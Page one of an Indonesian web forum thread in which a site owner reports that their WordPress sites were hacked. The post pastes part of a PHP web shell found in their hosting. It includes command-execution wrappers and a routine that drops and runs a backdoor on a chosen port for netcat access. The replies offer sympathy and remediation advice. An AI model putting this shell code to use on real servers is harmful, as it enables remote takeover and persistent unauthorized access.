1. Halo Guest, pastikan Anda selalu menaati peraturan forum sebelum mengirimkan post atau thread baru.

AWASS !! HAcKeR

Discussion in 'Wordpress' started by p3y3ks, Jul 5, 2011.

Tags:
Page 1 of 3
  1. p3y3ks

    p3y3ks Ads.id Fan

    Joined:
    Dec 15, 2010
    Messages:
    120
    Likes Received:
    11
    gan, hari ini semua web ane kena hack semua...

    terus terang gw kagak ngerti ttg script, tp pas ane cek di root hostingnya banyak .php yang tidak biasanya..

    dan dari script tsb, ada website firman.gunajaya.net

    di .htacess
    #Begin HG DENY
    #order deny,allow
    #deny from all
    #allow from 216.110.94.228
    #allow from 125.163.142.12
    #allow from 74.202.255.243
    #allow from 180.246.40.87
    #allow from 125.163.142.127
    #allow from 182.12.0.0/16
    # END HG DENY

    di config.inc.php dan neh scriptnya.. tolong di jelasin ya gan


    <?php
    error_reporting(0);
    @set_time_limit(0);
    $sh_name = "StealHealth";
    $sh_mainurl = "http://firman.gunajaya.net";
    $html_start = '<html><head>
    <title>'.getenv("HTTP_HOST").' - '.$sh_name.'</title>
    <style type="text/css">body,table { font-family:verdana;font-size:9px;color:#CCCCCC;background-color:#111111; }table { width:100%; border-color:#111111;border-width:0pt 1pt; border-style:solid; }td {background-color: #000500; font-family: Courier New; font-size:8pt; color:#999999; border-color:#FFFFFF; border-width:1pt 0pt; border-style:solid; border-collapse:collapse;padding:0pt 3pt;vertical-align:middle;}A:Link, A:Visited { color: #999999; text-decoration: none; }A.no:Link, A.no:Visited { text-decoration: none; }A:Hover, A:Visited:Hover , A.no:Hover, A.no:Visited:Hover { color: #666666; background-color:#333333; text-decoration: none; }input,select,option { font:8pt tahoma;color:#666666;margin:2;border:1px solid #666666; }textarea { color:#666666;font:verdana bold;border:1px solid ;margin:2; }.fleft { float:left;text-align:left; }.fright { float:right;text-align:right; }#pagebar { font:8pt tahoma;padding:5px; }#pagebar td { vertical-align:top; }#pagebar p { font:8pt tahoma;}#pagebar a { font-weight:bold;color:red; }#pagebar a:visited { color:#00CE00; }#mainmenu { text-align:center; }#mainmenu a { text-align: center;padding: 0px 5px 0px 5px; }#maininfo,.barheader,.barheader2 { text-align:center; }#maininfo td { padding:3px; }.barheader { font-weight:bold;padding:5px; }.barheader2 { padding:5px;border:2px solid #111111; }.contents,.explorer { border-collapse:collapse;}.contents td { vertical-align:top; }.mainpanel { border-collapse:collapse;padding:5px; }.barheader,.mainpanel table,td { border:1px solid #e17b02; }.mainpanel input,select,option { border:1px solid #e17b02;margin:0; }input[type="submit"] { border:1px solid #e17b02; }input[type="text"] { padding:3px;}.fxerrmsg { color:red; font-weight:bold; }#pagebar,#pagebar p,h1,h2,h3,h4,form { margin:0; }#pagebar,.mainpanel,input[type="submit"] { background-color:#111111; }.barheader2,input,select,option,input[type="submit"]:hover { background-color:#111111; }textarea,.mainpanel input,select,option { background-color:#111111; }</style></head>';
    $login = ""; $pass = ""; $md5_pass = ""; $host_allow = array("*"); $login_txt = "Restricted Area";
    $accessdeniedmess = "<META http-equiv=\"refresh\" content=\"2;URL=http://firman.gunajaya.net\"><body bgcolor=black><a href=\"$sh_mainurl\"><font color=lime>fx0</font></a>: <font color=red>access denied</font></body>";
    $gzipencode = TRUE; $filestealth = TRUE; $curdir = "./"; $tmpdir = ""; $tmpdir_log = "./";$log_email = ""; $sort_default = "0a"; $sort_save = TRUE; $sess_cookie = "capriv8vars"; $usefsbuff = TRUE;$copy_unset = FALSE;$hexdump_lines = 8;$hexdump_rows = 24;
    $win = strtolower(substr(PHP_OS,0,3)) == "win";
    $disablefunc = @ini_get("disable_functions");
    if (!empty($disablefunc)) {
    $disablefunc = str_replace(" ","",$disablefunc);
    $disablefunc = explode(",",$disablefunc);
    }
    function get_phpini() {
    function U_wordwrap($str) {
    $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true);
    return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str);
    }
    function U_value($value) {
    if ($value == '') return '<i>no value</i>';
    if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE';
    if ($value === null) return 'NULL';
    if (@is_object($value)) $value = (array) $value;
    if (@is_array($value)) {
    @ob_start();
    print_r($value);
    $value = @ob_get_contents();
    @ob_end_clean();
    }
    return U_wordwrap((string) $value);
    }
    if (@function_exists('ini_get_all')) {
    $r = "";
    echo "<table><tr class=barheader><td>Directive</td><td>Local Value</td><td>Global Value</td></tr>";
    foreach (@ini_get_all() as $key=>$value) {
    $r .= "<tr><td>".$key."</td><td><div align=center>".U_value($value['local_value'])."</div></td><td><div align=center>".U_value($value['global_value'])."</div></td></tr>";
    }
    echo $r;
    echo "</table>";
    }
    }

    function disp_drives($curdir,$surl) {
    $letters = "";
    $v = explode("\\",$curdir);
    $v = $v[0];
    foreach (range("A","Z") as $letter) {
    $bool = $isdiskette = $letter == "A";
    if (!$bool) {$bool = is_dir($letter.":\\");}
    if ($bool) {
    $letters .= "<a href=\"".$surl."x=ls&d=".urlencode($letter.":\\")."\"".
    ($isdiskette?" onclick=\"return confirm('Make sure that the diskette is inserted properly, otherwise an error may occur.')\"":"")."> [";
    if ($letter.":" != $v) {$letters .= $letter;}
    else {$letters .= "<font color=red>".$letter."</font>";}
    $letters .= "]</a> ";
    }
    }
    if (!empty($letters)) {Return $letters;}
    else {Return "None";}
    }

    if (!function_exists("myshellexec")) {
    if(is_callable("popen")) {
    function myshellexec($cmd) {
    if (!($p=popen("($cmd)2>&1","r"))) { return "popen Disabled!"; }
    while (!feof($p)) {
    $line=fgets($p,1024);
    $out .= $line;
    }
    pclose($p);
    return $out;
    }
    } else {
    function myshellexec($cmd) {
    global $disablefunc;
    $result = "";
    if (!empty($cmd)) {
    if (is_callable("exec") and !in_array("exec",$disablefunc)) {
    exec($cmd,$result);
    $result = join("\n",$result);
    } elseif (($result = $cmd) !== FALSE) {
    } elseif (is_callable("system") and !in_array("system",$disablefunc)) {
    $v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;
    } elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {
    $v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;
    } elseif (is_resource($fp = popen($cmd,"r"))) {
    $result = "";
    while(!feof($fp)) { $result .= fread($fp,1024); }
    pclose($fp);
    }
    }
    return $result;
    }
    }
    }
    function ex($cfe) {
    $res = '';
    if (!empty($cfe)) {
    if(function_exists('exec')) {
    @exec($cfe,$res);
    $res = join("\n",$res);
    } elseif(function_exists('shell_exec')) {
    $res = @shell_exec($cfe);
    } elseif(function_exists('system')) {
    @ob_start();
    @system($cfe);
    $res = @ob_get_contents();
    @ob_end_clean();
    } elseif(function_exists('passthru')) {
    @ob_start();
    @passthru($cfe);
    $res = @ob_get_contents();
    @ob_end_clean();
    } elseif(@is_resource($f = @popen($cfe,"r"))) {
    $res = "";
    while(!@feof($f)) { $res .= @fread($f,1024); }
    @pclose($f);
    } else { $res = "Ex() Disabled!"; }
    }
    return $res;
    }
    function which($pr) {
    $path = ex("which $pr");
    if(!empty($path)) { return $path; } else { return $pr; }
    }

    $hostname_x = php_uname(n);
    $itshome = getcwd();

    $Lversion = php_uname(r);
    $OSV = php_uname(s);

    if ($x == "mkdir")
    {
    if ($mkdir != $d)
    {
    if (file_exists($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: object alredy exists";}
    elseif (!mkdir($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: access denied";}
    echo '<br><br>';
    }
    $x = $dspact = 'ls';
    }
    function cf($fname,$text) {
    $w_file=@fopen($fname,"w") or err();
    if($w_file) {
    @fputs($w_file,@base64_decode($text));
    @fclose($w_file);
    }
    }

    function cfb($fname,$text) {
    $w_file=@fopen($fname,"w") or bberr();
    if($w_file) {
    @fputs($w_file,@base64_decode($text));
    @fclose($w_file);
    }
    }
    function err() { $_POST['backcconnmsge']="<br><br><div class=fxerrmsg>Error:</div> Can't connect!"; }
    function bberr() { $_POST['backcconnmsge']="<br><br><div class=fxerrmsg>Error:</div> Can't backdoor host!"; }

    if (!empty($_POST['backconnectport']) && ($_POST['use']=="shbd")) {
    $ip = gethostbyname($_SERVER["HTTP_HOST"]);
    $por = $_POST['backconnectport'];
    if (is_writable(".")) {
    cfb("shbd",$backdoor);
    ex("chmod 777 shbd");
    $cmd = "./shbd $por";
    exec("$cmd > /dev/null &");
    $scan = myshellexec("ps aux");
    } else {
    cfb("/tmp/shbd",$backdoor);
    ex("chmod 777 /tmp/shbd");
    $cmd = "./tmp/shbd $por";
    exec("$cmd > /dev/null &");
    $scan = myshellexec("ps aux");
    }
    if (eregi("./shbd $por",$scan)) {
    $data = ("\n<br>Backdoor setup successfully.");
    } else {
    $data = ("\n<br>Process not found, backdoor setup failed!");
    }
    $_POST['backcconnmsg']="To connect, use netcat! Usage: <b>'nc $ip $por'</b>.$data";
    }


    @ini_set("max_execution_time",0);
    if (!function_exists("getmicrotime")) {
    function getmicrotime() {
    list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);
    }
    }
    error_reporting(5);
    @ignore_user_abort(TRUE);
    @set_magic_quotes_runtime(0);
    define("starttime",getmicrotime());
    if (get_magic_quotes_gpc()) {
    if (!function_exists("strips")) {
    function strips(&$arr,$k="") {
    if (is_array($arr)) {
    foreach($arr as $k=>$v) {
    if (strtoupper($k) != "GLOBALS") { strips($arr["$k"]); }
    }
    } else {$arr = stripslashes($arr);}
    }
    }
    strips($GLOBALS);
    }
    .
    .
    .
    .
    msh panjang
     
    p3y3ks, Jul 5, 2011
    #1
  2. anisku11

    anisku11 Super Hero

    Joined:
    Jun 28, 2011
    Messages:
    1,627
    Likes Received:
    179
    Location:
    Semarang
    ,,wah gan
    passwordnya web sama semua ya??
    ,hmm ga ngerti coding ane
    nungguin mastah lewat aja
    :hmm2:
     
    anisku11, Jul 5, 2011
    #2
  3. phims

    phims Hero

    Joined:
    Apr 4, 2010
    Messages:
    694
    Likes Received:
    36
    Location:
    Jakarta
    mmmmmmmmmmmmm.... nunggu masternya nih... wahh ane kudu hati2 nih
     
    phims, Jul 5, 2011
    #3
  4. wikielf

    wikielf Dev Alpha 10

    Joined:
    May 20, 2011
    Messages:
    1,499
    Likes Received:
    132
    Location:
    In the world
    Mungkin itu udah kena Backdoor :peace:

    CMIIW
     
    wikielf, Jul 5, 2011
    #4
  5. ilham33

    ilham33 Trusted Web Hosting

    Joined:
    Feb 16, 2010
    Messages:
    2,785
    Likes Received:
    227
    Location:
    The North |
    coba PM blog kamu bro..cuma mau lihat ..:)
     
    ilham33, Jul 5, 2011
    #5
  6. chikmonk

    chikmonk Super Hero

    Joined:
    Jun 10, 2009
    Messages:
    1,919
    Likes Received:
    172
    Location:
    di kolong jembatan
    collapse:collapse;padding:5px; }.barheader,.mainpanel table,td { border:1px solid #e17b02; }.mainpanel input,select,option { border:1px solid #e17b02;margin:0; }input[type="submit"] { border:1px solid #e17b02; }input[type="text"] { padding:3px;}.fxerrmsg { color:red; font-weight:bold; }#pagebar,#pagebar p,h1,h2,h3,h4,form { margin:0; }#pagebar,.mainpanel,input[type="submit"] { background-color:#111111; }.barheader2,input,select,option,input[type="submit"]:hover { background-color:#111111; }textarea,.mainpanel input,select,option { background-color:#111111; }</style></head>';
    $login = ""; $pass = ""; $md5_pass = ""; $host_allow = array("*"); $login_txt = "Restricted Area";
    $accessdeniedmess = "<META http-equiv=\"refresh\" content=\"2;URL=hxxp://firman.gunajaya.net\"><body bgcolor=black><a href=\"$sh_mainurl\"><font color=lime>fx0</font></a>: <font color=red>access denied</font></body>";
    $gzipencode = TRUE; $filestealth = TRUE; $curdir = "./"; $tmpdir = ""; $tmpdir_log = "./";$log_email = ""; $sort_default = "0a"; $sort_save = TRUE; $sess_cookie = "capriv8vars"; $usefsbuff = TRUE;$copy_unset = FALSE;$hexdump_lines = 8;$hexdump_rows = 24;
    $win = strtolower(substr(PHP_OS,0,3)) == "win";
    $disablefunc = @ini_get("disable_functions");

    ntu yg tanda tebal punya sapa ya gan ???
    kaya kenal sih URLna....
     
    chikmonk, Jul 5, 2011
    #6
  7. jagoan

    jagoan Hero

    Joined:
    Aug 3, 2009
    Messages:
    646
    Likes Received:
    9
    Location:
    Karanganyar
    firman.gunajaya.net
     
    Last edited: Jul 6, 2011
    jagoan, Jul 5, 2011
    #7
  8. vickie modification

    vickie modification Banned

    Joined:
    Jul 4, 2011
    Messages:
    47
    Likes Received:
    0
    Hahaha kocak gan
     
    vickie modification, Jul 5, 2011
    #8
  9. p3y3ks

    p3y3ks Ads.id Fan

    Joined:
    Dec 15, 2010
    Messages:
    120
    Likes Received:
    11
    ada beberapa yang sama bro...

    asumsi ane, karena w3 total cache.. tp koq web ane yang kagak ada trafik and ga diinstall w3 kena juga.

    karena di .htacess ada url ke link paham.net. file .htacess ane bersihiin semua... and web udah ok tapi selang beberapa menit, tampilan berubah redirect ke paham.net (kamprettt neh orang sesama bangsa sendiri).

    kemudian ane cek di root, ada file2 aneh seperti indonesia.php, config-ini.php.

    dan pas ane buka, isinya kurang lebih seperti di thread ane bro..

    dan klo gampangnya di sort aja file managernya.. biasanya modified nya today



    ---------- Post added at 02:09 PM ---------- Previous post was at 02:07 PM ----------

    boleh bro... apa FB si kutu kupret itu bro?

     
    p3y3ks, Jul 5, 2011
    #9
  10. dNoxs

    dNoxs Ads.id Pro

    Joined:
    Dec 3, 2008
    Messages:
    441
    Likes Received:
    23
    weks.. ada orang yang lagi susah kena HACK kok masih bisa bilang KOCAK..

    hati-hati klo komen gan.. jangan cuma kejar setoran :entahlah:
     
    dNoxs, Jul 5, 2011
    #10
    xtmxady likes this.
  11. JhezeR

    JhezeR Super Hero

    Joined:
    Dec 14, 2009
    Messages:
    1,356
    Likes Received:
    59
    Location:
    Universe
    hosting dimana bro dan pake WP versi berapa?

    mesti rajin cek situs exploit ama perkuat security WP msg² nih
     
    JhezeR, Jul 5, 2011
    #11
  12. nodali

    nodali Ads.id Fan

    Joined:
    Jan 13, 2010
    Messages:
    230
    Likes Received:
    22
    Wah, mesti hati-hati ini. Gawat kalo gini terus..
     
    nodali, Jul 5, 2011
    #12
  13. ahmadm

    ahmadm Super Hero

    Joined:
    Jul 13, 2010
    Messages:
    1,032
    Likes Received:
    36
    Location:
    Bekasi Timoer
    emag nih orang gak ade kerjaan lain ape selain ngehack bangsa sendiri :hahaha2:

    BTW ente pake wordpress versi berape gan?
     
    ahmadm, Jul 5, 2011
    #13
  14. ijoel_jazz

    ijoel_jazz Ads.id Pro

    Joined:
    Jun 16, 2011
    Messages:
    418
    Likes Received:
    41
    Location:
    Bandung
    maap sob,..nubie cmn bisa kasi komen gini,..
    kalo udah kaya gitu mending ganti user sama pass di ftp nya,..
    and kalo bisa sekalian ganti wp baru,..
    itu biasanya masukin link dia dgn paksa ke situs nt,...
    alasannya biar ada backlink gt,..
    maap kalo comen ane tidak memuaskan,..
    smoga blog nt aman kembali
     
    ijoel_jazz, Jul 5, 2011
    #14
  15. barubelajar

    barubelajar Ads.id Fan

    Joined:
    Jul 25, 2010
    Messages:
    224
    Likes Received:
    2
    sob, semua webnya dalam satu hosting ya?? kl satu hosting, udah jelas kena satu kena semua. mending minta bantuan sama hostingnya sob....
     
    barubelajar, Jul 5, 2011
    #15
  16. cahpinter

    cahpinter Ads.id Starter

    Joined:
    Jun 20, 2010
    Messages:
    93
    Likes Received:
    8
    cahpinter, Jul 5, 2011
    #16
  17. brother

    brother >Walyatalattaf<

    Joined:
    Sep 12, 2010
    Messages:
    801
    Likes Received:
    31
    Location:
    ★Bumi Sukowati★
    wah keknya cracker dah prustasi sm online shop neh, atau cracking WP hanya utk iseng ya?

    barusan baca2 disini neh.

    http://wordpress.org/news/2011/06/passwords-reset/
     
    brother, Jul 5, 2011
    #17
  18. pikun

    pikun Hero

    Joined:
    Jul 5, 2010
    Messages:
    514
    Likes Received:
    91
    Bisa dizip trus diupload disini semua filenya? Atau pm aja url file zipnya. Penasaran gw, isi backdornya seperti apa.
    IMHO, url-url yang tercantum dibackdor bukanlah url penyusup, tapi hanya korban jg yg dijadikan perantara untuk proses-proses yg lain
     
    pikun, Jul 5, 2011
    #18
  19. FaVira

    FaVira Ads.id Pro

    Joined:
    Mar 28, 2011
    Messages:
    298
    Likes Received:
    139
    Mudah2an hal ini tidak akan pernah terkena ke ane dan juga teman2 lain di forum ini...

    Ayo siapa yg bisa bantu, tlg dong dibantu ampe selesai masalah kawan kita ini...

    SABAR GAN ..............
     
    FaVira, Jul 5, 2011
    #19
  20. kowek

    kowek Hero

    Joined:
    Nov 25, 2009
    Messages:
    629
    Likes Received:
    15
    saya ada 1 yg kena deface juga. :D
    saat itu pake wp versi 3.13. trus saya delete semua file yg ada di hosting. trus instal wp lagi versi 3.14. eh kena lagi. hehehe.
    ywd, suruh support nya reset ulang orderan hosting saya. sekarang udah beres. :D
     
    kowek, Jul 5, 2011
    #20
Page 1 of 3

Share This Page